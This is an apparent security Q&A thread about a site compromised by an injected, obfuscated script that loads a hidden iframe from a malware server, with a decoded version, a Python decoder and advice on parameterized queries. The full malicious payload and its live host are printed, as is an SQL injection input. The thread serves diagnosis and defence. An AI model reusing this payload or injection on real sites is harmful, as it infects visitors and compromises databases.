SQL injection attack insight

The following code is being added to our site. Below it is the effect it has on a page, basically opening an iframe to a malware site. Our site was suffering from this last week, and to fix the issue we just rolled back the database and codebase, which did fix it. I have a corrupt version I can work with and am searching for where the code came in and how, but I'm coming up with nothing. If it was entered through some form on the site, what might that entry look like in the db? If it modified a file in the codebase, why can't I find it? What should I be looking for? ANY insight into this would be super helpful. I'm trying to figure out where we need to plug up security.

Note: The original script had no line breaks. It is shown here with line breaks to make the code readable:

<script type="text/javascript" charset="utf-8">
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!6f!75!65!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!32!31!36!2e!31!31!3@!2e!31!31!34!2e!31!36!34!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!6f!75!65!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!6f!75!65!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b"
      .replace(/@/g,"9")
      .split("!");
   try{
      document.body&=0.1
   } catch(gdsgsdg) {
      zz=3;
      dbshre=103;
      if(dbshre){
         vfvwe=0;
         try{
            document;
         } catch(agdsg){
            vfvwe=1;
         }
         if(!vfvwe){
            e=eval;
         }
         s="";
         if(zz)
            for(i=0;i-480!=0;i++){
               if(window.document)
                  s+=ss(p(asgq[i],16));
            }
         if(window.document)
            e(s);
      }
   }
</script>

The embedded hex codes resolve to the following JavaScript:

(function () {
    var houe = document.createElement('iframe');

    houe.src = 'http://216.119.114.164/esd.php';
    houe.style.position = 'absolute';
    houe.style.border = '0';
    houe.style.height = '1px';
    houe.style.width = '1px';
    houe.style.left = '1px';
    houe.style.top = '1px';

    if (!document.getElementById('houe')) {
        document.write('<div id=\'houe\'></div>');
        document.getElementById('houe').appendChild(houe);
    }
})();

It is injecting div elements such as:

<div id="mgkc"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>

<div id="houe"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
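As an added example (not part of the question or any answer), a small Python routine that reverses the obfuscation statically instead of letting eval run it: it mirrors the script's replace(/@/g,"9").split("!") and String.fromCharCode(parseInt(chunk,16)) steps, then pulls the iframe src URLs out of the decoded text so they can be logged and blocked. The encoder, the benign sample snippet and its example.invalid host are constructed for this demo; the "(function () {" check uses the first chunks of the real asgq string shown above.

```python
import re


def decode_hex_payload(encoded: str) -> str:
    """Statically reverse the injected script's encoding.

    The script runs asgq.replace(/@/g, "9").split("!") and then feeds each
    chunk through String.fromCharCode(parseInt(chunk, 16)) before eval'ing
    the result. We do the same decoding but never execute the output.
    """
    chunks = encoded.replace("@", "9").split("!")
    return "".join(chr(int(chunk, 16)) for chunk in chunks if chunk)


def encode_hex_payload(text: str) -> str:
    """Produce the same '!'-separated hex format (with '9' written as '@').
    Used only to build a constructed sample; not part of the page."""
    return "!".join(format(ord(ch), "x").replace("9", "@") for ch in text)


def extract_iframe_sources(decoded_js: str) -> list:
    """Collect every URL assigned to a .src property in the decoded script.
    These are the indicators worth logging and blocking; single-quoted
    assignments are all the decoded payload above uses."""
    return re.findall(r"\.src\s*=\s*'([^']+)'", decoded_js)


# Constructed sample (not the real payload): a benign stand-in with the
# same shape as the decoded script, encoded with the scheme above.
SAMPLE_JS = (
    "(function () {\r\n"
    "    var f = document.createElement('iframe');\r\n"
    "    f.src = 'http://example.invalid/esd.php';\r\n"
    "})();"
)
ENCODED_SAMPLE = encode_hex_payload(SAMPLE_JS)

# The first chunks of the real asgq string from the page decode to the
# opening of the function wrapper, a quick sanity check of the decoder.
PAYLOAD_PREFIX = "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b"

if __name__ == "__main__":
    print(decode_hex_payload(PAYLOAD_PREFIX))          # (function () {
    decoded = decode_hex_payload(ENCODED_SAMPLE)
    print(decoded)
    print("iframe sources:", extract_iframe_sources(decoded))
```

Feeding the full asgq string from the page into decode_hex_payload yields the cleaned-up script shown above without executing anything.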

How do the forms on your site interact with your database? Do they create a direct connection to the DB or do they use a web service? If you are executing queries directly on the DB, then you should parameterize your queries.

What should I be looking for?

Assuming it is an sql injection problem (and this does sound right), you should be looking in your web application code for something like this:

sql = "SELECT columns FROM SomeTable WHERE SomeColumn=" + someVariable

If you let us know what language you use I might be able to give a more representative example, but the main thing is that anywhere you use string concatenation to put information from the user into an sql query — even if you run it through a function to sanitize, clean, or escape it — you are vulnerable. Note that this isn't even an insert/update/delete statement. It's just a select, and the semantics indicate that the sql is even expecting a numeric type. It doesn't matter: an attacker can still use this to change things in your data.

If you're using an ORM, you might even just be building one part of a WHERE clause, and so it might even just be this:

filter = "SomeDataField='" + someVariable + "'"

The correct way to handle it is using something called parameterized queries or prepared statements, depending on which kids you hang out with on the playground. These use code that looks more like this:

sql = "SELECT columns" + " FROM SomeTable WHERE SomeColumn= ?"
// Other code to define and set a parameter for SomeColumn goes here

Note that I did use string concatenation there (just for show, to demonstrate that you can build up a query this way), but that I did not use it to substitute user input into the query. The important thing to understand here is that using this scheme (if implemented properly), the user input is never substituted directly into the query, not even on the database server. Instead, it's transmitted separately and treated like a variable by the database engine as well.

Again, I might be able to give a better representation if I know what language/platform you're using. As an example (I'll use an UPDATE this time), here's one way to do it safely in C# with SQL Server:

using System.Data;
using System.Data.SqlClient;

// The @-placeholders stay in the SQL text; the values are attached below, never concatenated.
string sql = "UPDATE SomeTable SET SomeColumn= @SomeVariable WHERE ID= @UserID";
using (var cn = new SqlConnection("connection string here"))
using (var cmd = new SqlCommand(sql, cn))
{
    // Typed parameters: the driver sends the values separately from the statement.
    cmd.Parameters.Add("@SomeVariable", SqlDbType.VarChar, 50).Value = someVariable;
    cmd.Parameters.Add("@UserID", SqlDbType.Int).Value = UserID;

    cn.Open();
    cmd.ExecuteNonQuery();
}
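As an added illustration (not from the answer above), the same SELECT run in Python against an in-memory SQLite table, once with the concatenated form and once with the '?' placeholder form, given a value a form could submit into the numeric SomeColumn. The table contents and the input "0 OR 1=1" are constructed for the demo.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data: the answer's SomeTable with a numeric SomeColumn."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SomeTable (SomeColumn INTEGER, Secret TEXT)")
    conn.executemany("INSERT INTO SomeTable VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    conn.commit()
    return conn


def lookup_concatenated(conn: sqlite3.Connection, some_variable: str) -> list:
    """The pattern the answer warns about: the submitted text is pasted into
    the SQL, so the engine parses it as SQL even though SomeColumn is numeric."""
    sql = "SELECT Secret FROM SomeTable WHERE SomeColumn=" + some_variable
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, some_variable: str) -> list:
    """The answer's '?' form: the value travels separately from the SQL text
    and is compared against SomeColumn as data, never parsed as SQL."""
    sql = "SELECT Secret FROM SomeTable WHERE SomeColumn= ?"
    return [row[0] for row in conn.execute(sql, (some_variable,))]


# Constructed input: what a form field meant to hold a number might carry.
HOSTILE_INPUT = "0 OR 1=1"

if __name__ == "__main__":
    conn = build_demo_db()
    # A legitimate value behaves the same either way.
    print("concatenated,  '2':", lookup_concatenated(conn, "2"))
    print("parameterized, '2':", lookup_parameterized(conn, "2"))
    # Hostile value: concatenation returns every row; the parameter matches none.
    print("concatenated,  hostile:", lookup_concatenated(conn, HOSTILE_INPUT))
    print("parameterized, hostile:", lookup_parameterized(conn, HOSTILE_INPUT))
```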

There are multiple website vulnerability scanners that test for SQL injection and other vulnerabilities on websites. Here is a short list - check https://security.stackexchange.com/questions/32/what-tools-are-available-to-assess-the-security-of-a-web-application/38#38 for a larger one:

Additionally, see these links:

In general, you need to also do a search for every SQL command within your codebase and verify that no inputs are being sent unsanitized to the database.